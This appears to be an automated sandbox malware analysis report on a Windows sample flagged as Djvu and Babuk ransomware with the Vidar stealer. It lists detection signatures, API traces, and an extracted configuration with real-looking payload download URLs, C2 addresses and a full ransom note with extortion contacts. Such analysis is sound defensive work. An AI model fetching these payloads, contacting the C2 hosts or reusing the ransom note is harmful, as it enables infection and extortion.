Windows Analysis Report
SUwX12D2S6.exe

Overview

General Information

Sample name: SUwX12D2S6.exe
renamed because original name is a hash value
Original sample name: 4b2fb93459b4e03686148d0a1d3c1f00.exe
Analysis ID: 1430890
MD5: 4b2fb93459b4e03686148d0a1d3c1f00
SHA1: b16c9e43f7389ba51e1423f676cc61d9ec9d4354
SHA256: 200690de2b973c6f7a702d5129dea09aec57d548cab07e19f012e5a8e0c6ae64
Tags: exeStop
Infos:

Detection

Babuk, Clipboard Hijacker, Djvu, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Found ransom note / readme
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected Babuk Ransomware
Yara detected Clipboard Hijacker
Yara detected Djvu Ransomware
Yara detected Vidar stealer
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Infects executable files (exe, dll, sys, html)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes a notice file (html or txt) to demand a ransom
Writes many files with high entropy
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops certificate files (DER)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Babuk Babuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time. as well It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.babuk
Name Description Attribution Blogpost URLs Link
STOP, Djvu STOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stop
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

barindex
Source: SUwX12D2S6.exe Avira: detected
Source: http://sdfjhuz.com/dl/build2.exe$run Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Avira: detection malicious, Label: HEUR/AGEN.1313019
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Avira: detection malicious, Label: TR/AD.MalwareCrypter.llbpm
Source: 00000008.00000002.1966489860.0000000000400000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199673019888"]}
Source: 00000000.00000002.1676946978.0000000005E10000.00000040.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Djvu {"Download URLs": ["http://sdfjhuz.com/dl/build2.exe", "http://cajgtus.com/files/1/build3.exe"], "C2 url": "http://cajgtus.com/test2/get.php", "Ransom note file": "_README.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool:\r\nhttps://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0864PsawqS", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E
Source: sdfjhuz.com Virustotal: Detection: 23% Perma Link
Source: http://cajgtus.com/files/1/build3.exe$runinstall020921_delay721_sec.exe0D Virustotal: Detection: 9% Perma Link
Source: http://cajgtus.com/test2/get.php Virustotal: Detection: 14% Perma Link
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Virustotal: Detection: 40% Perma Link
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Virustotal: Detection: 87% Perma Link
Source: SUwX12D2S6.exe Virustotal: Detection: 40% Perma Link
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Joe Sandbox ML: detected
Source: SUwX12D2S6.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_00411178 CryptDestroyHash,CryptReleaseContext, 1_2_00411178
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext, 1_2_0040E870
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_0040EA51 CryptDestroyHash,CryptReleaseContext, 1_2_0040EA51
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext, 1_2_0040EAA0
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_0040EC68 CryptDestroyHash,CryptReleaseContext, 1_2_0040EC68
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext, 1_2_00410FC0
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext, 4_2_0040E870
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext, 4_2_0040EAA0
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext, 4_2_00410FC0
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_00411178 CryptDestroyHash,CryptReleaseContext, 4_2_00411178
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0040EA51 CryptDestroyHash,CryptReleaseContext, 4_2_0040EA51
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0040EC68 CryptDestroyHash,CryptReleaseContext, 4_2_0040EC68
Source: SUwX12D2S6.exe, 00000006.00000002.4130188988.0000000000802000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_ea8d3d42-d

Compliance

barindex
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Unpacked PE file: 1.2.SUwX12D2S6.exe.400000.0.unpack
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Unpacked PE file: 4.2.SUwX12D2S6.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Unpacked PE file: 6.2.SUwX12D2S6.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Unpacked PE file: 12.2.SUwX12D2S6.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build3.exe Unpacked PE file: 16.2.build3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Unpacked PE file: 24.2.SUwX12D2S6.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Unpacked PE file: 26.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Unpacked PE file: 29.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Unpacked PE file: 31.2.mstsca.exe.400000.0.unpack
Source: SUwX12D2S6.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\_README.txt Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\$WinREAgent\_README.txt Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\$WinREAgent\Scratch\_README.txt Jump to behavior
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe File created: C:\_README.txt
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe File created: C:\Users\user\_README.txt
Source: unknown HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.66.133.162:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 95.217.9.149:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\Q source: SUwX12D2S6.exe, 00000004.00000003.2226957493.00000000038C6000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2225920544.00000000038C2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2223567308.00000000038C2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2227590465.00000000038DF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\te\ source: SUwX12D2S6.exe, 00000004.00000003.2174722676.000000000356A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error.bgzqat source: SUwX12D2S6.exe, 00000004.00000003.2110957880.000000000315A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: SUwX12D2S6.exe, 00000004.00000003.2169822173.0000000003161000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2159585768.0000000003163000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2157654247.000000000315A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2176334680.000000000316C000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2157384871.0000000003146000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ta\C source: SUwX12D2S6.exe, 00000004.00000003.2210484839.0000000003417000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2202211710.00000000033FF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: SUwX12D2S6.exe, 00000004.00000003.2233587760.000000000394F000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2226957493.0000000003962000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2233015637.000000000390F000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2231618846.00000000038EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\we\g source: SUwX12D2S6.exe, 00000004.00000003.2237119019.0000000003514000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2239471258.00000000034EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\_m source: SUwX12D2S6.exe, 00000004.00000003.2170576871.00000000033EE000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2184538505.00000000033F1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: SUwX12D2S6.exe, 00000004.00000003.2236436289.0000000003893000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\A source: SUwX12D2S6.exe, 00000004.00000003.2226957493.00000000038C6000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2225920544.00000000038C2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2223567308.00000000038C2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2227590465.00000000038DF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: SUwX12D2S6.exe, 00000004.00000003.2233587760.000000000394F000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2226957493.0000000003962000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2233015637.000000000390F000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2231618846.00000000038EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: SUwX12D2S6.exe, 00000004.00000003.2226957493.00000000038C6000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2225920544.00000000038C2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2223567308.00000000038C2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2217897189.00000000038AB000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2216202881.00000000038A9000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2218553034.00000000038C2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2227590465.00000000038DF000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2217675191.00000000038A9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: SUwX12D2S6.exe, 00000004.00000003.2217897189.00000000038AB000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2216202881.00000000038A9000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2208481995.00000000038A9000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2217675191.00000000038A9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: SUwX12D2S6.exe, 00000004.00000003.2236436289.00000000038EE000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2231618846.00000000038EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: SUwX12D2S6.exe, 00000004.00000003.2135310569.0000000003493000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2110681040.00000000034F2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136261874.000000000350D000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135016253.00000000033F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\celefeboxu.pdb source: SUwX12D2S6.exe
Source: Binary string: C:\baduleropolec\83 roxihapuponab.pdb source: build2.exe, 00000007.00000002.1785156949.0000000000410000.00000002.00000001.01000000.00000008.sdmp, build2.exe, 00000007.00000000.1781524100.0000000000410000.00000002.00000001.01000000.00000008.sdmp, build2.exe, 00000008.00000000.1783808645.0000000000410000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\W source: SUwX12D2S6.exe, 00000004.00000003.2135310569.0000000003493000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2110681040.00000000034F2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136261874.000000000350D000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136368733.0000000003534000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135016253.00000000033F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\l\\ source: SUwX12D2S6.exe, 00000004.00000003.2217897189.00000000038AB000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2216202881.00000000038A9000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2217675191.00000000038A9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\State\ source: SUwX12D2S6.exe, 00000004.00000003.2158068491.000000000353F000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2156495174.000000000353F000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2174722676.000000000356A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2159634085.0000000003564000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: build3.exe, 0000000A.00000000.1805138719.0000000000401000.00000020.00000001.01000000.00000009.sdmp, build3.exe, 0000000A.00000002.1913333134.0000000000401000.00000020.00000001.01000000.00000009.sdmp, build3.exe, 00000010.00000000.1911812806.0000000000401000.00000020.00000001.01000000.00000009.sdmp, mstsca.exe, 00000013.00000000.1918990852.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 00000013.00000002.2018872471.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 00000014.00000000.2017466458.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 00000019.00000002.2348608889.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 00000019.00000000.2275814306.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001A.00000000.2347560708.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001C.00000002.2973317219.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001C.00000000.2865813530.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001D.00000000.2972376587.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001E.00000002.3583754315.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001E.00000000.3466010192.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001F.00000000.3582957712.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 00000020.00000002.4129370107.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 00000020.00000000.4066108806.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\*z source: SUwX12D2S6.exe, 00000004.00000003.2158386481.0000000003410000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135411368.000000000340B000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2156718696.00000000033E7000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2157238464.000000000340B000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135016253.00000000033F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\Temp\( source: SUwX12D2S6.exe, 00000004.00000003.2223567308.000000000376A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2226563641.0000000003853000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2215986355.000000000381E000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2217021524.000000000381E000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2223984909.000000000382F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\q source: SUwX12D2S6.exe, 00000004.00000003.1882036014.0000000003148000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.1843805332.0000000003148000.00000004.00000020.00020000.00000000.sdmp
